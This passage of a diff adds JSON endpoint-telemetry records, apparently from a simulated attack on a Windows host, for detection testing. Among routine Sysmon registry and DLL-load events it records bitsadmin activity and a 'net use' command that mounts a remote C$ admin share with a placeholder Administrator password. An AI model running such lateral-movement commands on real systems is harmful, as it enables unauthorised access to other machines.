"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ncryptsslp.dll", + "image_path": "C:\\Windows\\System32\\ncryptsslp.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570904180000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": 
"mpr.dll", + "image_path": "C:\\Windows\\System32\\mpr.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570905119984, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 
+ "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dpapi.dll", + "image_path": "C:\\Windows\\System32\\dpapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "file", + "file_name": "BIT6BFA.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\BIT6BFA.tmp", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570905580000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883570905580000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 5868, + 
"process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570906360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "process", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "subtype": "terminate", + "timestamp": 131883570906360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "process", + "pid": 2108, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" + }, + { + "event_type": "file", + "file_name": "BITSADMIN.EXE-80E1BDAA.pf", + "file_path": "C:\\Windows\\Prefetch\\BITSADMIN.EXE-80E1BDAA.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4924, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570906590000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4924, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" + }, + { + "event_type": "image_load", 
+ "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4924, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4924, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4924, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4924, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" + }, + { + "event_type": "process", + "pid": 4924, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"cmd.exe /c \" net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2260, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570909009984, + "unique_pid": 
"{42FC7E13-CAE2-5C05-0000-001085164E01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" + }, + { + "command_line": "cmd.exe /c net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7556, + 
"ppid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570909130000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}", + "unique_ppid": "{42FC7E13-CAE2-5C05-0000-001085164E01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" + }, + { + "command_line": "net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator", + 
"event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6292, + "ppid": 7556, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "subtype": "create", + "timestamp": 131883570909230000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}", + "unique_ppid": "{42FC7E13-CAE2-5C05-0000-001024194E01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6292, + "process_name": "net.exe", + 
"process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": 
"C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\System32\\mpr.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + 
